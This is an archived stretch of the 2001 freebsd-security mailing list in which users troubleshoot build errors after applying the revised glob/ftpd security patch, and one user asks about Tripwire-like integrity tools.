References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="VywGB/WGlW4DM4P8" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from chris@jeah.net on Thu, Apr 19, 2001 at 02:20:01PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --VywGB/WGlW4DM4P8 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote: > /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse': > /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use > in this function) > /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is > reported only once > /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.) > *** Error code 1 >=20 Did you copy the patched /usr/src/include/glob.h to /usr/include/ like the revised advisory states? --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --VywGB/WGlW4DM4P8 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrfPPgACgkQObaG4P6BelAQCgCdFZboLJNH035sg4V4QKWS04LF BksAoKH6AoTI2SRTzVMfgliM+ODwSOyM =lp9P -----END PGP SIGNATURE----- --VywGB/WGlW4DM4P8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:33:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id 8AA5F37B424 for ; Thu, 19 Apr 2001 12:33:09 -0700 (PDT) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.3/8.11.0) with ESMTP id f3JJWAb95472; Thu, 19 Apr 2001 14:32:10 -0500 (CDT) (envelope-from chris@jeah.net) Date: Thu, 19 Apr 2001 14:32:09 -0500 (CDT) From: Chris Byrnes To: Chris Faulhaber Cc: Subject: Re: Security, glob FTP, new fix In-Reply-To: <20010419153104.C81766@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org indeed i did Chris Byrnes, chris@JEAH.net JEAH Communications, http://www.JEAH.net 608.244.9525 (Toll), 1.866.AWW.JEAH (Toll-Free) On Thu, 19 Apr 2001, Chris Faulhaber wrote: > On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote: > > /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse': > > /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use > > in this function) > > /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is > > reported only once > > /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.) > > *** Error code 1 > > > > Did you copy the patched /usr/src/include/glob.h to /usr/include/ > like the revised advisory states? > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:33:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from radix.cryptio.net (radix.cryptio.net [199.181.107.213]) by hub.freebsd.org (Postfix) with ESMTP id 16B3C37B449 for ; Thu, 19 Apr 2001 12:33:15 -0700 (PDT) (envelope-from emechler@radix.cryptio.net) Received: (from emechler@localhost) by radix.cryptio.net (8.11.3/8.11.3) id f3JJX0H75281; Thu, 19 Apr 2001 12:33:00 -0700 (PDT) (envelope-from emechler) Date: Thu, 19 Apr 2001 12:33:00 -0700 From: Erick Mechler To: Emre Bastuz Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tripwire or the like for FreeBSD ? Message-ID: <20010419123300.E73738@techometer.net> References: <3ADF3CCC.FB8498DC@emre.de> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF3CCC.FB8498DC@emre.de>; from Emre Bastuz on Thu, Apr 19, 2001 at 09:30:20PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ports are your friend: /usr/ports/security/tripwire... See http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/ports.html for more info on how to use the ports collection. --Erick At Thu, Apr 19, 2001 at 09:30:20PM +0200, Emre Bastuz said this: :: Hi, :: :: I was just wondering if there is Tripwire for FreeBSD or some decent tool :: that has similar/better functionality ? :: :: The Tripwire homepage seems to bee pretty commercial and lacks a BSD :: version (they seem to be focused on Linux). :: :: I found something called "Aide" in the ports directory, but to be honest - :: I don´t trust a "Version 0.7" when it comes to security. :: :: Does anyone know any alternative ? :: :: Regards, :: :: Emre :: :: -- :: Emre Bastuz :: info@emre.de http://www.emre.de :: UIN: 561260 PGP Key ID: 0xAFAC77FD :: :: To Unsubscribe: send mail to majordomo@FreeBSD.org :: with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:43:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 3671D37B422 for ; Thu, 19 Apr 2001 12:43:09 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id A954C13614; Thu, 19 Apr 2001 15:43:08 -0400 (EDT) Date: Thu, 19 Apr 2001 15:43:08 -0400 From: Chris Faulhaber To: Chris Byrnes Cc: security@freebsd.org Subject: Re: Security, glob FTP, new fix Message-ID: <20010419154308.D81766@peitho.fxp.org> References: <20010419153104.C81766@peitho.fxp.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="11Y7aswkeuHtSBEs" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from chris@jeah.net on Thu, Apr 19, 2001 at 02:32:09PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --11Y7aswkeuHtSBEs Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 02:32:09PM -0500, Chris Byrnes wrote: > indeed i did >=20 I am unable to reproduce this on a 4.2-STABLE box from December. The updated patch definitely adds GLOB_MAXPATH to glob.h so I have no idea why your ftpcmd.y is not picking it up. --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org > On Thu, 19 Apr 2001, Chris Faulhaber wrote: >=20 > > On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote: > > > /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse': > > > /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first = use > > > in this function) > > > /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is > > > reported only once > > > /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.) > > > *** Error code 1 > > > > > > > Did you copy the patched /usr/src/include/glob.h to /usr/include/ > > like the revised advisory states? > > --11Y7aswkeuHtSBEs Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrfP8wACgkQObaG4P6BelD9fACdHcRZ5UrqnAjoo8WQNGIOvsxA Q+8AnR58xEPMxU66IGT0chdaeXffJT/S =PIyO -----END PGP SIGNATURE----- --11Y7aswkeuHtSBEs-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:43:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id DA2A637B422 for ; Thu, 19 Apr 2001 12:43:21 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 27DDF66B38; Thu, 19 Apr 2001 12:43:17 -0700 (PDT) Date: Thu, 19 Apr 2001 12:43:16 -0700 From: Kris Kennaway To: Chris Byrnes Cc: Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Security, glob FTP, new fix Message-ID: <20010419124316.B53464@xor.obsecurity.org> References: <20010419153104.C81766@peitho.fxp.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="rJwd6BRFiFCcLxzm" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from chris@jeah.net on Thu, Apr 19, 2001 at 02:32:09PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --rJwd6BRFiFCcLxzm Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Apr 19, 2001 at 02:32:09PM -0500, Chris Byrnes wrote: > > Did you copy the patched /usr/src/include/glob.h to /usr/include/ > > like the revised advisory states? ^^^^^^^ > indeed i did The revised advisory has only been out for a few minutes, are you sure you got the UPDATED patch? Kris --rJwd6BRFiFCcLxzm Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE63z/UWry0BWjoQKURAjJkAKDxOcGniN+eZFfa2roWDBt0swBh+wCeP7z/ z0MR7kK+GkwpgzVwc8HlVT0= =6Tph -----END PGP SIGNATURE----- --rJwd6BRFiFCcLxzm-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:43:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id A484537B43E for ; Thu, 19 Apr 2001 12:43:52 -0700 (PDT) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.3/8.11.0) with ESMTP id f3JJgrO96834; Thu, 19 Apr 2001 14:42:53 -0500 (CDT) (envelope-from chris@jeah.net) Date: Thu, 19 Apr 2001 14:42:53 -0500 (CDT) From: Chris Byrnes To: Chris Faulhaber Cc: Subject: Re: Security, glob FTP, new fix In-Reply-To: <20010419154308.D81766@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Perhaps removing /usr/src/libexec/ftpd and doing a new cvsup would fix the problem? Chris Byrnes, chris@JEAH.net JEAH Communications, http://www.JEAH.net 608.244.9525 (Toll), 1.866.AWW.JEAH (Toll-Free) On Thu, 19 Apr 2001, Chris Faulhaber wrote: > On Thu, Apr 19, 2001 at 02:32:09PM -0500, Chris Byrnes wrote: > > indeed i did > > > > I am unable to reproduce this on a 4.2-STABLE box from December. > The updated patch definitely adds GLOB_MAXPATH to glob.h so I > have no idea why your ftpcmd.y is not picking it up. > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > > > On Thu, 19 Apr 2001, Chris Faulhaber wrote: > > > > > On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote: > > > > /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse': > > > > /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use > > > > in this function) > > > > /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is > > > > reported only once > > > > /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.) > > > > *** Error code 1 > > > > > > > > > > Did you copy the patched /usr/src/include/glob.h to /usr/include/ > > > like the revised advisory states? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13: 7:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from wysoft.tzo.com (c481444-a.bremtn1.wa.home.com [24.12.235.202]) by hub.freebsd.org (Postfix) with ESMTP id EAFDE37B43C for ; Thu, 19 Apr 2001 13:07:37 -0700 (PDT) (envelope-from wysoft@wysoft.tzo.com) Received: from localhost (wysoft@localhost) by wysoft.tzo.com (8.11.1/8.11.1) with ESMTP id f3JK7bp25321 for ; Thu, 19 Apr 2001 13:07:37 -0700 (PDT) (envelope-from wysoft@wysoft.tzo.com) Date: Thu, 19 Apr 2001 13:07:36 -0700 (PDT) From: Jeff Wyman To: freebsd-security@freebsd.org Subject: Yet another Glob-related problem Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alright. I am running 4.2-RELEASE on my system, and seem to be having problems that I haven't exactly seen on the list yet (unless I'm looking wrong). I have a fresh source tree, with the revised glob patch applied, as well as the new glob.h installed. When compiling glob.c in the make of libc, I get this error: cc -O -pipe -mpentium -march=pentium -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/lib c/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/.. /libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:199: `GLOB_BRACE' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:199: (Each undeclared identifier is reporte d only once /usr/src/lib/libc/../libc/gen/glob.c:199: for each function it appears in.) *** Error code 1 Stop in /usr/src/lib/libc. Sorry for the wrappage. I use pine, a serious problem many think I need treatment for. Please cc responses to my email address if you'd like, else I'll just check the archives every few hours (I'm not subscribed). -------------------------------------------------------------------------- There's so much bullshit in space that there couldn't possibly be any good reason for any god to wish to create it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:11:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 6E22337B43C for ; Thu, 19 Apr 2001 13:11:48 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 419121360C; Thu, 19 Apr 2001 16:11:48 -0400 (EDT) Date: Thu, 19 Apr 2001 16:11:48 -0400 From: Chris Faulhaber To: Jeff Wyman Cc: freebsd-security@freebsd.org Subject: Re: Yet another Glob-related problem Message-ID: <20010419161148.F81766@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Jeff Wyman , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="nYySOmuH/HDX6pKp" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from wysoft@wysoft.tzo.com on Thu, Apr 19, 2001 at 01:07:36PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --nYySOmuH/HDX6pKp Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 01:07:36PM -0700, Jeff Wyman wrote: > Alright. I am running 4.2-RELEASE on my system, and seem to be having > problems that I haven't exactly seen on the list yet (unless I'm looking > wrong). I have a fresh source tree, with the revised glob patch applied, > as well as the new glob.h installed. When compiling glob.c in the make of > libc, I get this error: >=20 > cc -O -pipe -mpentium -march=3Dpentium -DLIBC_RCS -DSYSLIBC_RCS > -I/usr/src/lib/lib > c/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > -I/usr/src/lib/libc/.. > /libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o > glob.o > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': > /usr/src/lib/libc/../libc/gen/glob.c:199: `GLOB_BRACE' undeclared (first > use in > this function) Could you check the validity of your glob.h? GLOB_BRACE has been present in glob.h since the 4.4BSD-lite import. --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --nYySOmuH/HDX6pKp Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrfRoQACgkQObaG4P6BelATwwCdG5zyCGEElxIZSIXNLDktLlHg JK4An3gcIWtJ4mKQ/RsKxPycxtKS7B1m =1/AT -----END PGP SIGNATURE----- --nYySOmuH/HDX6pKp-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:15:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from urdvg001.cms.usa.net (urdvg001.cms.usa.net [165.212.11.1]) by hub.freebsd.org (Postfix) with SMTP id 3F64337B42C for ; Thu, 19 Apr 2001 13:15:40 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 10406 invoked from network); 19 Apr 2001 20:15:39 -0000 Received: from uadvg128.cms.usa.net (165.212.11.128) by corprelay.cms.usa.net with SMTP; 19 Apr 2001 20:15:39 -0000 Received: (qmail 23885 invoked by uid 0); 19 Apr 2001 20:15:39 -0000 Received: USA.NET MXFirewall, messaging filters applied; Thu, 19 Apr 2001 20:15:38 GMT Received: from packeteer.com [207.78.98.2] by uadvg128 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 334FDsuPI0282M16; Thu, 19 Apr 2001 20:15:34 GMT Message-ID: <3ADF479E.48C2BF0B@packeteer.com> Date: Thu, 19 Apr 2001 13:16:30 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Another glob problem Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Meanwhile, *my* build is failing in mpool.c: cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/db/hash/hsearch.c -o hsearch.o cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/db/hash/ndbm.c -o ndbm.o cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/db/mpool/mpool.c -o mpool.o /usr/src/lib/libc/../libc/db/mpool/mpool.c: In function `mpool_open': /usr/src/lib/libc/../libc/db/mpool/mpool.c:89: structure has no member named `tqh_first' /usr/src/lib/libc/../libc/db/mpool/mpool.c:89: structure has no member named `tqh_last' /usr/src/lib/libc/../libc/db/mpool/mpool.c:89: structure has no member named `tqh_first' /usr/src/lib/libc/../libc/db/mpool/mpool.c:91: structure has no member named `tqh_first' ... and so on for about 100 more of these missing member references. Then it Error 1's. I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src and a fresh make world as of about ten minutes ago. Anybody else gotten this far? Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:17:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 071C537B440 for ; Thu, 19 Apr 2001 13:17:16 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 637C366B38; Thu, 19 Apr 2001 13:17:15 -0700 (PDT) Date: Thu, 19 Apr 2001 13:17:15 -0700 From: Kris Kennaway To: Jeff Wyman Cc: freebsd-security@FreeBSD.ORG Subject: Re: Yet another Glob-related problem Message-ID: <20010419131715.A54132@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="envbJBWh7q8WU6mo" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from wysoft@wysoft.tzo.com on Thu, Apr 19, 2001 at 01:07:36PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --envbJBWh7q8WU6mo Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 01:07:36PM -0700, Jeff Wyman wrote: > Alright. I am running 4.2-RELEASE on my system, and seem to be having > problems that I haven't exactly seen on the list yet (unless I'm looking > wrong). I have a fresh source tree, with the revised glob patch applied, > as well as the new glob.h installed. When compiling glob.c in the make of > libc, I get this error: >=20 > cc -O -pipe -mpentium -march=3Dpentium -DLIBC_RCS -DSYSLIBC_RCS > -I/usr/src/lib/lib > c/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > -I/usr/src/lib/libc/.. > /libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o > glob.o > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': > /usr/src/lib/libc/../libc/gen/glob.c:199: `GLOB_BRACE' undeclared (first > use in > this function) > /usr/src/lib/libc/../libc/gen/glob.c:199: (Each undeclared identifier is > reporte > d only once > /usr/src/lib/libc/../libc/gen/glob.c:199: for each function it appears > in.) > *** Error code 1 Something is screwed up on your system: GLOB_BRACE has been in since 1994: 1.1 (rgrimes 24-May-94): #define GLOB_BRACE 0x0080 /* = Expand braces ala csh. */ Kris --envbJBWh7q8WU6mo Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE630fKWry0BWjoQKURAt8rAKC5vHX+MJ87OcsQocVG8zujJpU6kgCglzjw 4xyEJxdokl8KBbO1Dlwdr6c= =f7d9 -----END PGP SIGNATURE----- --envbJBWh7q8WU6mo-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:22: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from wysoft.tzo.com (c481444-a.bremtn1.wa.home.com [24.12.235.202]) by hub.freebsd.org (Postfix) with ESMTP id A96DB37B422 for ; Thu, 19 Apr 2001 13:22:06 -0700 (PDT) (envelope-from wysoft@wysoft.tzo.com) Received: from localhost (wysoft@localhost) by wysoft.tzo.com (8.11.1/8.11.1) with ESMTP id f3JKM2c25376; Thu, 19 Apr 2001 13:22:02 -0700 (PDT) (envelope-from wysoft@wysoft.tzo.com) Date: Thu, 19 Apr 2001 13:22:02 -0700 (PDT) From: Jeff Wyman To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: Re: Yet another Glob-related problem In-Reply-To: <20010419131715.A54132@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, I don't know what to say. The line is present in both /usr/include/glob.h and /usr/src/include/glob.h (I tried with both new and old files to make sure both of those locations had the right files). #define GLOB_BRACE 0x0080 /* Expand braces ala csh. */ Seems to be it. > Something is screwed up on your system: GLOB_BRACE has been in > since 1994: > > 1.1 (rgrimes 24-May-94): #define GLOB_BRACE 0x0080 /* Expand braces ala csh. */ > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:23:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from urdvg001.cms.usa.net (urdvg001.cms.usa.net [165.212.11.1]) by hub.freebsd.org (Postfix) with SMTP id D54A037B424 for ; Thu, 19 Apr 2001 13:23:12 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 13209 invoked from network); 19 Apr 2001 20:23:12 -0000 Received: from uadvg129.cms.usa.net (165.212.11.129) by corprelay.cms.usa.net with SMTP; 19 Apr 2001 20:23:12 -0000 Received: (qmail 21013 invoked by uid 0); 19 Apr 2001 20:23:12 -0000 Received: USA.NET MXFirewall, messaging filters applied; Thu, 19 Apr 2001 20:23:11 GMT Received: from packeteer.com [207.78.98.2] by uadvg129 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 321FDsuXJ0126M20; Thu, 19 Apr 2001 20:23:09 GMT Message-ID: <3ADF4965.6253D0B7@packeteer.com> Date: Thu, 19 Apr 2001 13:24:05 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: Another glob problem Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src > and a fresh make world as of about ten minutes ago. Argh... let me rephrase that. I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to be the right one) and a fresh cvsup as of about ten minutes ago. Yeesh.. Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:25:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 8B91437B424 for ; Thu, 19 Apr 2001 13:25:44 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 9A00E1360C; Thu, 19 Apr 2001 16:25:43 -0400 (EDT) Date: Thu, 19 Apr 2001 16:25:43 -0400 From: Chris Faulhaber To: Brian Tiemann Cc: security@freebsd.org Subject: Re: Another glob problem Message-ID: <20010419162543.G81766@peitho.fxp.org> References: <3ADF4965.6253D0B7@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="nhYGnrYv1PEJ5gA2" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF4965.6253D0B7@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 01:24:05PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --nhYGnrYv1PEJ5gA2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote: > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in = /usr/src > > and a fresh make world as of about ten minutes ago. >=20 > Argh... let me rephrase that. >=20 > I'm running 4.2-RELEASE, with the March 22 glob.h installed in > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to > be the right one) and a fresh cvsup as of about ten minutes ago. >=20 > Yeesh.. >=20 A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former, the patch is not required. --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --nhYGnrYv1PEJ5gA2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrfSccACgkQObaG4P6BelDe+ACfR2OiID68SQYfjaJH7SAx0vTd OGQAnAhOuYLPiI/gEgBDje4+vWXzjqLz =6aOo -----END PGP SIGNATURE----- --nhYGnrYv1PEJ5gA2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:37:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from homepage.ru (homepage.ru [195.242.9.13]) by hub.freebsd.org (Postfix) with ESMTP id 135A837B43E for ; Thu, 19 Apr 2001 13:37:54 -0700 (PDT) (envelope-from dk@homepage.ru) Received: from 